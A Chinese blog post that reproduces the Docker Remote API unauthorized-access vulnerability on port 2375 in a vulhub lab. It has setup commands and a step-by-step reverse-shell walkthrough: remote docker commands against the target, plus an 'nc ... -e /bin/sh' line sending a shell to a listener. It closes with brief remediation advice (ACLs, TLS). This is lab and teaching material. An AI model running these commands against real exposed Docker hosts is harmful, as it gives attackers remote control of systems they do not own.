Docker Daemon API未授权

最新推荐文章于 2025-02-19 16:43:24 发布
原创 最新推荐文章于 2025-02-19 16:43:24 发布 · 570 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#1024程序员节 #Docker #容器安全

本文详细介绍了Docker Remote API的一个安全漏洞,该漏洞允许未授权访问,可能导致远程命令执行。攻击者可以利用暴露在外网的2375端口,通过一系列步骤实现对目标系统的控制。修复建议包括限制网络访问和启用TLS认证。

影响范围

Docker ALL 

漏洞类型

未授权访问类

利用条件

影响范围应用

漏洞概述

Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且未作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行

漏洞复现

环境搭建

下载环境

mkdir docker
cd docker 
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/Dockerfile
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-compose.yml
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-entrypoint.sh

 之后给docker-entrypoint.sh赋予执行权限

chmod 777 docker-entrypoint.sh

编译并启动环境

docker-compose up -d

漏洞利用

漏洞检测

docker -H tcp://192.168.17.140:2375 images

反弹shell

Step 1:在VPS上监听9999端口

nc -lnvp 9999

 Step 2:查看目标系统上存在的镜像

docker -H tcp://192.168.17.140:2375 images

 Step 3:之后创建一个轻量级镜像

docker -H tcp://192.168.17.140:2375 run -id  alpine:latest

Step 4:查看运行的容器信息获取对应的容器ID

docker -H tcp://192.168.17.140:2375 ps

  Step 5:进入容器并通过nc进行反弹shell

docker -H tcp://192.168.17.140:2375 exec -it cbb678549422  sh
nc 192.168.17.128 9999 -e /bin/sh

 Step 6:在攻击主机中成功接收到shell

 Step 7:退出并删除容器

exit
docker -H tcp://192.168.17.140:2375 rm cbb678549422 -f
docker -H tcp://192.168.17.140:2375 ps

修复建议

1、对2375端口做网络访问控制,例如:ACL控制

2、修改docker swarm的认证方式,使用TLS认证

docker daemon api 未授权访问漏洞
渗透之路,攻防之间皆学问
04-19 5668
一. 漏洞描述 Docker daemon api是使用url代替命令行来操作dockerdocker swarm 是docker下的集群管理工具,在开放2375端口来监听集群容器时,会调用这个api,可以执行docker命令。 二. 漏洞验证 1.环境搭建 使用vulhub的环境 cd /vulhub-master/docker/unauthorized-rce 执行docker-compose up -d启动环境 2.使用浏览器访问2375端口,通过url的方式调用API,返回{"me.
docker daemon api 未授权访问漏洞复现
whojoe的博客
06-30 2561
docker daemon api 未授权访问漏洞复现+环境搭建参考文章 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/docker/unauthorized-rce/ 启动容器 docker-compose up -d 查看容器 docker ps 这里的访问http://127.
Docker Daemon API未授权访问到RCE
Fly_鹏程万里
12-24 3314
影响范围 Docker ALL 漏洞类型 未授权访问类 利用条件 REST API外置 漏洞概述 Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且未作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行 漏洞复现 环境搭建 下载环境 mkdir docker cd docker wget https://raw.githubusercontent.com/vulhub/vulhub/master/d..
19 - vulhub - docker daemon api 未授权访问漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-15 2000
Docker是一款国内外云平台常用的应用程序轻量级容器,AWS,百度等都有使用。通常用于轻量化部署应用。 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该未授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker
安全笔记-Docker daemon api 未授权访问漏洞复现及利用
NoooEmotion的博客
02-07 2099
未授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker
vulhub漏洞—docker_daemon_api未授权访问漏洞
weixin_45808483的博客
12-17 1453
docker remote api docker remote api主要的目的是取代命令行界面, docker client和docker daemon通过unix domain socket进行通信. 默认情况下,只有本机的root和docker组用户才能操作docker. 漏洞成因 dockerd -H unix:///var/run/docker. sock -H 0.0. 0.0:2375 docker守护进程监听在0.0.0.0,外网可访问 没有使用iptable等限制可连接的来源
利用Vulnhub复现漏洞 - docker daemon api 未授权访问漏洞
JiangBuLiu的博客
07-02 1708
docker daemon api 未授权访问漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/docker/unauthorized-rce/README.zh-cn.md 漏洞原理 http://www.loner.fm/drops/#!/drops/1203.新...
Docker Remote API未授权访问
lyink001的博客
12-16 1570
docker remote api获取服务器权限
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接
qq_45234543的博客
11-23 3440
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接,docker未授权漏洞利用,ssh密钥连接
Docker远程接口未授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 3144
Docker远程接口未授权访问漏洞解决方案之 Docker Remote API TLS 认证
漏洞复现-docker-unauthorized-rce
qq_59350385的博客
06-27 9592
一、漏洞介绍1.1漏洞成因 docker remote API未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展2.2环境准备 靶机环境:192.168.xx.xxx (ubuntu) 攻击环境:192.168.xx.xxx (kali) 在靶机上使用复现漏洞环境。 vulhub官网地址:https://vulhub.org 二、漏洞检测直接输入地址 ;若能访
vluhub之docker-unauthoriun-rce复现
weixin_45006525的博客
08-07 1760
1.漏洞简介: 该未授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url实现docker命令。 2.漏洞复现 环境介绍: 1.攻击机kali:192.168.231.128 2.靶机ubuntu:192.168.231.185 靶场搭建 (1):ubuntu下载vluhub vulhub官网地址:https://vulhub.org github下载:https://github.com/vulhub/vulh
Docker|漏洞】Docker api未授权导致rce
wei的博客
05-28 2314
解决docker api未授权导致rce漏洞修复
Docker未授权访问漏洞(www.hetianlab.com)
懂进攻知防守
07-20 3636
Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器Docker Daemon把服务暴露在tcp的2375端口上,这样就可以在网络上操作Docker了。Docker本身没有身份认证的功能,只要网络上能访问到服务端口,就可以操作Docker。...
【云安全】云原生-Docker(六)Docker API 未授权访问
仇辉攻防的博客
02-19 1324
Docker APIDocker 容器平台提供的一组 RESTful API,用于与 Docker 守护程序进行通信和管理 Docker 容器。通过 Docker API,用户可以通过 HTTP 请求来执行诸如创建、启动、停止、删除容器等操作。同时,Docker API 还允许用户管理镜像、网络、卷等 Docker 资源。用户可以使用任何支持 HTTP 请求的工具或库来访问 Docker API,从而实现与 Docker 容器平台的集成和自动化管理。
未授权访问:Docker未授权访问漏洞
qq_68163788的博客
05-14 3663
Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台DockerDocker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API
Docker未授权访问(docker unauthorized)开启2375端口
zkjsdk的博客
10-26 2076
漏洞名称:Docker未授权访问 漏洞危害:未经授权的用户可以直接访问数据库中的所有信息,造成 严重的信息泄漏。 漏洞级别:高危 漏洞验证: https://download.youkuaiyun.com/download/zkjsdk/34648476 Docker连接工具 下载直接默认安装就行 tcp连接输入ip端口 X.X.X.X:2375 修复方案 (1)执行命令后在如下内容,修改红线部分内容,添加 -H tcp://0.0.0.0:2375: (2) (3)systemctl daemon-rel.
Docker 未授权访问漏洞
Thunderclap的博客
07-13 2634
Docker 未授权访问漏洞
Docker Remote API未授权访问漏洞(原理扫描) 如何解决
最新发布
07-22
首先,用户的问题是:“Docker Remote API未授权访问漏洞(原理扫描)如何解决”,要求用中文回答。 关键点: - **问题主题**:Docker Remote API未授权访问漏洞(原理扫描)的解决方法。 - **要求**:回答完问题后...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值